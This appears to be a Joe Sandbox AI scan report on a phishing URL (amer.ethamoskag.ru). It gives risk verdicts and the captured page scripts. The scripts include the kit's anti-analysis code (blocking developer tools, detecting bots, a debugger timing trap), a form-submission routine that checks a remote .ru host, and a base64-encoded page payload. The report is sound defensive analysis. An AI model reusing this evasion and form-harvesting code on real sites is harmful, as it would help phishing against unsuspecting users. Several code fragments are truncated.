| URL: https://aMER.ethamoskag.ru Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true,
"reasoning": "This URL appears to be attempting to typosquat 'American Express' (AMER) with mixed case letters. The .ru TLD (Russian) is suspicious for a financial service website. The domain 'ethamoskag' appears randomly generated and hosts third-party content. This shows classic signs of a phishing attempt."
} |
URL: https://aMER.ethamoskag.ru |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of evading detection and potentially carrying out phishing or other malicious activities."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
yxSmjHBUuy = false;
(function DYbMCcMziL() {
let rDOnllzRQb = false;
const WDkZiVCxKn = 100;
setInterval(function() {
const pGBoVFklZk = performance.now();
debugger;
const CrTKJXHDFw = performance.now();
if (CrTKJXHDFw - pGBoVFklZk > WDkZiVCxKn && !rDOnllzRQb) {
yxSmjHBUuy = true;
rDOnllzRQb = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `fetch` API to send user data to an untrusted domain, and it also attempts to redirect the user to a Microsoft login page, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicative of malicious intent."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA1mOjQlyo8gEN4C',
'error-callback': FMNntwBYdW,
callback: GQkRbIxESk,
});
function FMNntwBYdW() {
turnstile.reset();
}
function GQkRbIxESk() {
var uoBMMrsWaA = document.getElementById("YyWmndKYIu");
uoBMMrsWaA.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'F0uwY';
var MEyPAPLeUw = "../hf8chAMffvt0mEAvhVJALwFsjetsSypIEKu39k";
fetch('https://yMVOBUm9iALUU7NhWViJ54fe8Xo2Bbey7wmkhcbDYvv6yry4Z8yRHnX.gageodeg.ru/5312178142814933351oBvbiYrEQHSXJZCUUFLMNYDGFPMNBJYRCBTNRLWBFQYYBZMEOGCIPPN', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(MEyPAPLeUw, {
method: "POST",
body: new FormData(uoBMMrsWaA)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(yxSmjHBUuy == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to execute remote code is a clear indicator of malicious intent. Additionally, the script attempts to disable common browser security features like the context menu and keyboard shortcuts, further suggesting suspicious activity. Overall, this script demonstrates a high level of risk and should be treated with caution."
} |
if(atob("aHR0cHM6Ly9TRC5ldGhhbW9za2FnLnJ1LzBjVXJjdzMv") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNQR2paSnpBdVNjIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1BHalpKekF1U2MgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1BHalpKekF1U2MgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojUEdqWkp6QXVTYyBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1BHalpKekF1U2MuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTA3cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNQR2paSnpBdVNjIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQojUEdqWkp6QXVTYyAuY29sLWxnLTR7ZmxleDowIDAgYXV0bzt3aWR0aDozMy4zMzMzMzMzMyU7fQ0KfQ0KI1BHalpKekF1U2MgLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQojUEdqWkp6QXVTYyAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQojUEdqWkp6QXVTYyAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI1BHalpKekF1U2MgLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI1BHalpKekF1U2MubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNQR2paSnpBdVNjIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojUEdqWkp6QXVTYyAjRGhXa1RJVG1QeiB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NCkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDcyKSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIHJldHVybiBmYWxzZTsNCn0pOw0KeXhTbWpIQlV1eSA9IGZhbHNlOw0KKGZ1bmN0aW9uIERZYk1DY016aUwoKSB7DQogICAgbGV0IHJET25sbHpSUWIgPSBmYWxzZTsNCiAgICBjb25zdCBXRGtaaVZDeEtuID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBwR0JvVkZrbFprID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAg |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication with the parent window, which is a common pattern for these types of challenges. While the script uses some techniques like message handling and dynamic code execution, these are typical for Cloudflare's managed challenge system and do not appear to be malicious in nature. Overall, the script demonstrates low-risk indicators and is likely part of a legitimate security mechanism, so the risk score is assessed as 3 (Low Risk)."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'nmbvr',
chlApiSitekey: '0x4AAAAAAA1mOjQlyo8gEN4C',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'B.uKZV0SVbyX7zbvVzaB2mY9MQdaEGGtmW2ns9Z1QLI-1736951087-1.3.1.1-EdnCmhnuRUj6ipv_dSq5gsNdndTj8T6IN5b2_dTKtWA',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '902688066fd5f78d',
cH: 'eKD8U0t4B1h_tWt9uxH52_lJ3NkOQxUu2Gy_hGEo8qw-1736951087-1.1.1.1-BAo65JZsyX7GqM_JuMzTDQ4WXSqoO3aSqNZ.zlXnSqvjKniAhq5BfV0yfh4_lYu_',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'ltVMxmjsMQY3bMtwE4bHpdAnH40C4O3Jo85Qo0RVjNg-1736951087-1.1.1.1-txHhb3v6dhb5hvtuyeRfThf28exGz9RwLXRteldCf5w3s_GDvW598EOLpX6AEj23TV86YK4AO4bs1HdRaCzQrgEclykpenxiBmo9Z3ouMVSB_FTI_jZOZc9UnktH5HgWTX34eUHsrBmac9OMooPDSu5CtTk.qVnavBMqKXz6Zx64mgFmJwR8E1sG2pMTq0K.6Uox16tVLzK6OIOtSSApr4OvRG1NsCsSkqpwiUzD4kP1Sp6KvlfZNP.6opmVorWPQyNLg13QJUalU0B7jBOmq54epgt800ux0U0PC5kTOWyxs.CvdPEww0Wgvx8WEts8SKOWvGSNDOeu1eRMydL3o6_qt4Ql_lTP8F2qX6tA2_CBHOIuW61I6THSxdxw9Nn0m6d5pLvREVmT.ZvwCF9zco_ubFIShyuEOcYbgvmjJsbIsotBuusVS23gZ0GjI5DiZVbniNOtMckJRj9c9vCpEkO.WjIbvhS9nF0vLyuc3Yhm4k_h.XbIunPC4QzF51Jyr3WcvzdGiAPOpmc8.uQrKHBTGj.BsBe2nsCbr4qVlQ.Exl3rudynPo8WKn1ww9VO8BxoArEP3uw7e.XYjMq1JpYqSnpFiQuk3jFTDGz5qt_Pr4giJtv9buhqaHHjxgMXIWL833rHGL8jUtr8FD1S6UQ_bxBYPWLiKgOvAHNrWvJmaSzjCtWJ9A2oN1zssMcvubKRpDAtlwPJdj_gQX8wwn59dGgfif2PG.jkMT_KgvHAn9eeGejzJ.olay9_J6agE1QUq8CiN8qqYq_Ym4d.TPPp0dTOA5hVrKwYO9wlLwsgVXHT6vod59.Am0DEMkhSnNEhnAO15pM9LD2Ap2LtVljZw1L63DfMR_ULD0ERHB1n4DJra7MX7oR3NL925MaRv_qY24CNRBk9Qvz_NWpjv8unDeASceiAhjdKAGd7U1VQXOiRGbu_qY1VFKI.TVoHFLguwUGmeGdqDqyzmTmX_8k60qngN9yPuR.Wqdc8VwzVzZVAp0jPKzqegmaJUu3L6DCabcH_2B2veyzJo0_OXQXYXxkzg2NI35.CAR_lqtJBQ6sTLJbkW78k6yneL2zyYQ0n.IHUfkLlky48Gz37b0O3Z.VYAtGSHHffZ82rbnVXg.FB6Hio8pmzUz3iDsr7T2LWr_VUDkgJcbTdNrubAbZo6oBzncr3dQWRY27QinNrnGPRMUT5HQtYKHz7DzF.I1KvAPqBFlELO083De9yoJ4a26bd3aVTE1Oa4zZYzO3IsWrHWqc0d2ct4amC.xdGE.GDvPsj0CA4rMhAG3gxJRYeSnThj0eRKeZtFPzs6rVe4sCo9aZEcYjG9.81mWZzcdupj0_e_dm.DOGeAA.rYGK1fw80XeRFW.gr4V7wemE',
cITimeS: '1736951087',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'nmbvr',
nextRcV: 'B.uKZV0SVbyX7zbvVzaB2mY9MQdaEGGtmW2ns9Z1QLI-1736951087-1.3.1.1-EdnCmhnuRUj6ipv_dSq5gsNdndTj8T6IN5b2_dTKtWA',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The snippet primarily focuses on implementing core cryptographic functionality, which is a legitimate use case. While it uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are common practices in cryptographic libraries. Overall, the risk score is low, as the script is likely part of a legitimate cryptographic library and does not exhibit any clear malicious intent."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. It primarily handles the Cloudflare challenge process, including translations and polyfills, which are typical for this type of functionality. While the script uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are within the expected context of a Cloudflare challenge. Overall, the script seems to be a legitimate security mechanism and does not pose a significant risk."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_verifying":"Verifying...","turnstile_success":"Success%21","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_feedback_report":"Having%20trouble%3F","turnstile_feedback_description":"Send%20Feedback","turnstile_footer_terms":"Terms","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_refresh":"Refresh","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","human_button_text":"Verify%20you%20are%20human","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired","testing_only":"Testing%20only.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_failure":"Error","testing_only_always_pass":"Testing%20only%2C%20always%20pass."},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fj,fm,fo,fp,fq,fC,fO,fU,fV,fW,g6,gh,gl,gs,gw,gx,gB,gC,gG,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1097))/1+-parseInt(gI(1234))/2+-parseInt(gI(481))/3+-parseInt(gI(1250))/4+parseInt(gI(844))/5+-parseInt(gI(1049))/6+-parseInt(gI(1485))/7*(-parseInt(gI(1527))/8),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,343289),eM=this||self,eN=eM[gJ(1114)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(771)](eP),eP++);gH=(eQ=(0,eval)(gJ(1095)),eR=atob(gJ(868)),eM[gJ(1502)]=function(hh,d,e,f,g){hh=gJ,d={},d[hh(1584)]=hh(1806),d[hh(482)]=hh(941),e=d,f=1,g=1e3*eM[hh(602)][hh(411)](2<<f,32),eM[hh(975)](function(hi){hi=hh,eM[hi(1806)]&&(eM[hi(1103)][hi(1062)](),eM[hi(1103)][hi(928)](),eM[hi(822)]=!![],eM[e[hi(1584)]][hi(1211)]({'source':hi(1883),'widgetId':eM[hi(828)][hi(652)],'event':hi(1639),'cfChlOut':eM[hi(828)][hi(462)],'cfChlOutS':eM[hi(828)][hi(943)],'code':e[hi(482)],'rcV':eM[hi(828)][hi(898)]},'*'))},g)},eM[gJ(1830)]=function(g,h,i,hj,j,k,l,H,m,n,o,s,x,B,C,D,E,F,I,J,K){k=(hj=gJ,j={},j[hj(1820)]=function(G,H){return G>H},j[hj(1333)]=function(G,H){return G&H},j[hj(1562)]=hj(497),j[hj(1661)]=hj(1883),j[hj(916)]=hj(614),j[hj(1809)]=hj(649),j[hj(1242)]=hj(540),j[hj(593)]=function(G,H){return G||H},j[hj(1563)]=hj(493),j[hj(532)]=function(G,H){return G+H},j[hj(731)]=function(G,H){return G+H},j[hj(764)]=hj(1571),j[hj(1207)]=hj(1046),j[hj(728)]=hj(1713),j[hj(729)]=hj(772),j[hj(555)]=hj(1865),j);try{if(k[hj(1809)]===hj(649)){(l=fh(g[hj(1581)],g[hj(664)]),g[hj(1581)]instanceof Error)?k[hj(1242)]!==k[hj(1242)]?(H=o[hj(448)](s),k[hj(1820)](128,H)?n+=x[hj(771)](H):(127<H&&k[hj(1820 |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://amer.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library. It does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or obfuscated code. The script primarily defines utility functions and prototypes for DOM manipulation and event handling, which are typical for jQuery. There are no interactions with external domains or suspicious behaviors present. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return 